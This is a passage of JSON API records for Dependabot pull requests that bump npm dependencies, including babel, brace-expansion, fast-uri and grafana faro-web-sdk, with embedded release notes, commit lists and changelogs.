href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a458f66074b97d54773db8159af673d23b26079b\"\u003e\u003ccode\u003ea458f66\u003c/code\u003e\u003c/a\u003e v7.29.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/32ebd5aaf2526ddd176fd6a3d1e3dc594abdc8d9\"\u003e\u003ccode\u003e32ebd5a\u003c/code\u003e\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17974\"\u003e#17974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/0053db620c05acf0036f593b5aaf4e372daa79d0\"\u003e\u003ccode\u003e0053db6\u003c/code\u003e\u003c/a\u003e Update polyfill packages (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17727\"\u003e#17727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/61647ae2397c82c3c71f077b5ab109106a5cac0f\"\u003e\u003ccode\u003e61647ae\u003c/code\u003e\u003c/a\u003e v7.28.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a177d551adba99773f4ff00ea9bf46550def6132\"\u003e\u003ccode\u003ea177d55\u003c/code\u003e\u003c/a\u003e [Babel 8] Use \u003ccode\u003et.traverseFast\u003c/code\u003e to replace some \u003ccode\u003epath.traverse\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17518\"\u003e#17518\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/eebd3a06021c13d335b5b0bd79734df3abbea678\"\u003e\u003ccode\u003eeebd3a0\u003c/code\u003e\u003c/a\u003e v7.27.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/317e332e650bc04907bc787ab79f930288a3e71e\"\u003e\u003ccode\u003e317e332\u003c/code\u003e\u003c/a\u003e Enforce node protocol import (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17207\"\u003e#17207\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/fdc0fb59e119ee0b38bced63867a344a5b4bc2f3\"\u003e\u003ccode\u003efdc0fb5\u003c/code\u003e\u003c/a\u003e [Babel 8] Bump nodejs requirements to \u003ccode\u003e^20.19.0 || \u0026gt;= 22.12.0\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17204\"\u003e#17204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-modules-systemjs\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​babel/plugin-transform-modules-systemjs\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.12 to 1.1.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBackport v5.0.6 change to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/111\"\u003e#111\u003c/a\u003e)  0b09384\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.14...v1.1.15\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.14...v1.1.15\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2203f4f4895eba16c4d408b4219ce1b8e5f6ff24\"\u003e\u003ccode\u003e2203f4f\u003c/code\u003e\u003c/a\u003e 1.1.15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0b0938410732370559704230724ca4a44d1b29fd\"\u003e\u003ccode\u003e0b09384\u003c/code\u003e\u003c/a\u003e Backport v5.0.6 change to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/111\"\u003e#111\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.12...v1.1.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fast-uri` from 3.0.3 to 3.1.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastify/fast-uri/releases\"\u003efast-uri's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.1.2\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed fragment decoding as a parse error by \u003ca href=\"https://github.com/mcollina\"\u003e\u003ccode\u003e@​mcollina\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/171\"\u003efastify/fast-uri#171\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.1.1\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild(deps-dev): bump tsd from 0.32.0 to 0.33.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/148\"\u003efastify/fast-uri#148\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/149\"\u003efastify/fast-uri#149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(.npmrc): ignore sc...\n\n_Description has been truncated_","html_url":"https://github.com/Dct555/graphiql/pull/5","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dct555%2Fgraphiql/issues/5","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/5/packages"}},{"old_version":"5.2.3","new_version":"5.2.4","update_type":"patch","path":null,"pr_created_at":"2026-05-29T22:05:53.000Z","version_change":"5.2.3 → 5.2.4","issue":{"uuid":"4551920197","node_id":"PR_kwDODjzvHs7g0j_u","number":4268,"state":"closed","title":"Bump the patch-and-minor group across 1 directory with 24 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-06-03T04:29:21.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-29T22:05:53.000Z","updated_at":"2026-06-03T04:29:23.000Z","time_to_close":368608,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"patch-and-minor","update_count":24,"packages":[{"name":"@grafana/faro-web-sdk","old_version":"2.4.0","new_version":"2.7.0","repository_url":"https://github.com/grafana/faro-web-sdk"},{"name":"@grafana/faro-web-tracing","old_version":"2.4.0","new_version":"2.7.0","repository_url":"https://github.com/grafana/faro-web-sdk"},{"name":"@sentry/browser","old_version":"10.51.0","new_version":"10.53.1","repository_url":"https://github.com/getsentry/sentry-javascript"},{"name":"@sentry/cli","old_version":"3.4.1","new_version":"3.4.3","repository_url":"https://github.com/getsentry/sentry-cli"},{"name":"@sentry/react","old_version":"10.51.0","new_version":"10.53.1","repository_url":"https://github.com/getsentry/sentry-javascript"},{"name":"@tanstack/react-query","old_version":"5.100.9","new_version":"5.100.13","repository_url":"https://github.com/TanStack/query"},{"name":"axios","old_version":"1.15.2","new_version":"1.16.1","repository_url":"https://github.com/axios/axios"},{"name":"echarts","old_version":"6.0.0","new_version":"6.1.0","repository_url":"https://github.com/apache/echarts"},{"name":"postcss","old_version":"8.5.12","new_version":"8.5.15","repository_url":"https://github.com/postcss/postcss"},{"name":"@babel/preset-env","old_version":"7.29.2","new_version":"7.29.5","repository_url":"https://github.com/babel/babel"},{"name":"@babel/register","old_version":"7.28.6","new_version":"7.29.3","repository_url":"https://github.com/babel/babel"},{"name":"@tanstack/react-query-devtools","old_version":"5.100.9","new_version":"5.100.13","repository_url":"https://github.com/TanStack/query"},{"name":"babel-jest","old_version":"30.3.0","new_version":"30.4.1","repository_url":"https://github.com/jestjs/jest"},{"name":"eslint-plugin-storybook","old_version":"10.3.6","new_version":"10.4.1","repository_url":"https://github.com/storybookjs/storybook"},{"name":"jest","old_version":"30.3.0","new_version":"30.4.2","repository_url":"https://github.com/jestjs/jest"},{"name":"jest-environment-jsdom","old_version":"30.3.0","new_version":"30.4.1","repository_url":"https://github.com/jestjs/jest"},{"name":"msw","old_version":"2.13.6","new_version":"2.14.6","repository_url":"https://github.com/mswjs/msw"},{"name":"storybook","old_version":"10.3.6","new_version":"10.4.1","repository_url":"https://github.com/storybookjs/storybook"},{"name":"terser-webpack-plugin","old_version":"5.5.0","new_version":"5.6.0","repository_url":"https://github.com/webpack/minimizer-webpack-plugin"},{"name":"typescript-eslint","old_version":"8.59.1","new_version":"8.59.4","repository_url":"https://github.com/typescript-eslint/typescript-eslint"},{"name":"webpack","old_version":"5.106.2","new_version":"5.107.1","repository_url":"https://github.com/webpack/webpack"},{"name":"webpack-dev-server","old_version":"5.2.3","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"express-rate-limit","old_version":"8.5.0","new_version":"8.5.2","repository_url":"https://github.com/express-rate-limit/express-rate-limit"},{"name":"helmet","old_version":"8.1.0","new_version":"8.2.0","repository_url":"https://github.com/helmetjs/helmet"}],"path":null,"ecosystem":"npm"},"body":"Bumps the patch-and-minor group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@grafana/faro-web-sdk](https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk) | `2.4.0` | `2.7.0` |\n| [@grafana/faro-web-tracing](https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing) | `2.4.0` | `2.7.0` |\n| [@sentry/browser](https://github.com/getsentry/sentry-javascript) | `10.51.0` | `10.53.1` |\n| [@sentry/cli](https://github.com/getsentry/sentry-cli) | `3.4.1` | `3.4.3` |\n| [@sentry/react](https://github.com/getsentry/sentry-javascript) | `10.51.0` | `10.53.1` |\n| [@tanstack/react-query](https://github.com/TanStack/query/tree/HEAD/packages/react-query) | `5.100.9` | `5.100.13` |\n| [axios](https://github.com/axios/axios) | `1.15.2` | `1.16.1` |\n| [echarts](https://github.com/apache/echarts) | `6.0.0` | `6.1.0` |\n| [postcss](https://github.com/postcss/postcss) | `8.5.12` | `8.5.15` |\n| [@babel/preset-env](https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env) | `7.29.2` | `7.29.5` |\n| [@babel/register](https://github.com/babel/babel/tree/HEAD/packages/babel-register) | `7.28.6` | `7.29.3` |\n| [@tanstack/react-query-devtools](https://github.com/TanStack/query/tree/HEAD/packages/react-query-devtools) | `5.100.9` | `5.100.13` |\n| [babel-jest](https://github.com/jestjs/jest/tree/HEAD/packages/babel-jest) | `30.3.0` | `30.4.1` |\n| [eslint-plugin-storybook](https://github.com/storybookjs/storybook/tree/HEAD/code/lib/eslint-plugin) | `10.3.6` | `10.4.1` |\n| [jest](https://github.com/jestjs/jest/tree/HEAD/packages/jest) | `30.3.0` | `30.4.2` |\n| [jest-environment-jsdom](https://github.com/jestjs/jest/tree/HEAD/packages/jest-environment-jsdom) | `30.3.0` | `30.4.1` |\n| [msw](https://github.com/mswjs/msw) | `2.13.6` | `2.14.6` |\n| [storybook](https://github.com/storybookjs/storybook/tree/HEAD/code/core) | `10.3.6` | `10.4.1` |\n| [terser-webpack-plugin](https://github.com/webpack/minimizer-webpack-plugin) | `5.5.0` | `5.6.0` |\n| [typescript-eslint](https://github.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/typescript-eslint) | `8.59.1` | `8.59.4` |\n| [webpack](https://github.com/webpack/webpack) | `5.106.2` | `5.107.1` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.3` | `5.2.4` |\n| [express-rate-limit](https://github.com/express-rate-limit/express-rate-limit) | `8.5.0` | `8.5.2` |\n| [helmet](https://github.com/helmetjs/helmet) | `8.1.0` | `8.2.0` |\n\n\nUpdates `@grafana/faro-web-sdk` from 2.4.0 to 2.7.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/grafana/faro-web-sdk/releases\"\u003e@​grafana/faro-web-sdk's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.7.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.3...v2.7.0\"\u003e2.7.0\u003c/a\u003e (2026-05-20)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e include git commit hash in app meta (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2039\"\u003e#2039\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/9c82ce49bc6d02c8a9b9a83227f101ce224a79b8\"\u003e9c82ce4\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e fall back to window when resolving Metro bundle id (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2079\"\u003e#2079\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/3cfd6204b7bc83e5c440c523b6287993ccfbd728\"\u003e3cfd620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e bind Tempo OTLP receiver to 0.0.0.0 so Alloy can reach it (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2038\"\u003e#2038\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7a0af536a4a7254bf62473b20d04cf937ecd246a\"\u003e7a0af53\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e use \u003ccode\u003egrafana server\u003c/code\u003e subcommand for Grafana 13 image (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2035\"\u003e#2035\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/5d9210769e5e0752f41a3f543089397d9fe8149a\"\u003e5d92107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update npm-dependencies (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2077\"\u003e#2077\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8574f5579b8c84a829269aa7e19e76238daa6b6e\"\u003e8574f55\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003epin package manager and disable yarn/npm scripts (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2075\"\u003e#2075\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ef2d248259f99e3e712bceff0f6fc99f6b0d81e1\"\u003eef2d248\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.6.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.2...v2.6.3\"\u003e2.6.3\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e make release-please auto-tag on merge (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2069\"\u003e#2069\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/de9e2f05c28ea5644a8f8647c41f8eb686e2736c\"\u003ede9e2f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.6.2\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/v2.6.2/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for the full list of changes.\u003c/p\u003e\n\u003cp\u003eThis release was tagged manually as a one-off recovery. Release-please's title parser still doesn't match merged release PRs back to their config because of how it handles \u003ccode\u003ecomponent\u003c/code\u003e together with \u003ccode\u003einclude-component-in-tag: false\u003c/code\u003e. A follow-up will redesign the release-please configuration.\u003c/p\u003e\n\u003ch2\u003ev2.6.1\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/v2.6.1/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for the full list of changes.\u003c/p\u003e\n\u003cp\u003eThis release was tagged manually as a one-off recovery; release-please could not auto-tag PR \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2064\"\u003e#2064\u003c/a\u003e because the title pattern was missing \u003ccode\u003e${component}\u003c/code\u003e. Fixed in \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2066\"\u003e#2066\u003c/a\u003e \\u2014 the next release will tag automatically.\u003c/p\u003e\n\u003ch2\u003ev2.6.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/v2.6.0/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for the full list of changes.\u003c/p\u003e\n\u003cp\u003eThis release was tagged manually as a one-off recovery; release-please could not auto-tag PR \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2052\"\u003e#2052\u003c/a\u003e because its title (\u003ccode\u003echore: release main\u003c/code\u003e) lacked \u003ccode\u003e${version}\u003c/code\u003e. The PR title pattern was fixed in \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2063\"\u003e#2063\u003c/a\u003e — future releases will tag automatically.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/main/CHANGELOG.md\"\u003e@​grafana/faro-web-sdk's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.3...v2.7.0\"\u003e2.7.0\u003c/a\u003e (2026-05-20)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e include git commit hash in app meta (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2039\"\u003e#2039\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/9c82ce49bc6d02c8a9b9a83227f101ce224a79b8\"\u003e9c82ce4\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e fall back to window when resolving Metro bundle id (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2079\"\u003e#2079\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/3cfd6204b7bc83e5c440c523b6287993ccfbd728\"\u003e3cfd620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e bind Tempo OTLP receiver to 0.0.0.0 so Alloy can reach it (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2038\"\u003e#2038\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7a0af536a4a7254bf62473b20d04cf937ecd246a\"\u003e7a0af53\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e use \u003ccode\u003egrafana server\u003c/code\u003e subcommand for Grafana 13 image (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2035\"\u003e#2035\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/5d9210769e5e0752f41a3f543089397d9fe8149a\"\u003e5d92107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update npm-dependencies (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2077\"\u003e#2077\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8574f5579b8c84a829269aa7e19e76238daa6b6e\"\u003e8574f55\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003epin package manager and disable yarn/npm scripts (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2075\"\u003e#2075\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ef2d248259f99e3e712bceff0f6fc99f6b0d81e1\"\u003eef2d248\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.2...v2.6.3\"\u003e2.6.3\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e make release-please auto-tag on merge (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2069\"\u003e#2069\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/de9e2f05c28ea5644a8f8647c41f8eb686e2736c\"\u003ede9e2f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.1...v2.6.2\"\u003e2.6.2\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e include ${component} in release-please PR title (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2066\"\u003e#2066\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/367aacc76fbb4777a61da40652bbe891826e0039\"\u003e367aacc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.0...v2.6.1\"\u003e2.6.1\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e set release-please PR title pattern with version (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2063\"\u003e#2063\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/4310b1685b4963de539919a15edd797aa21d032b\"\u003e4310b16\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.5.0...v2.6.0\"\u003e2.6.0\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereplay:\u003c/strong\u003e pause recording after user inactivity (\u003ca 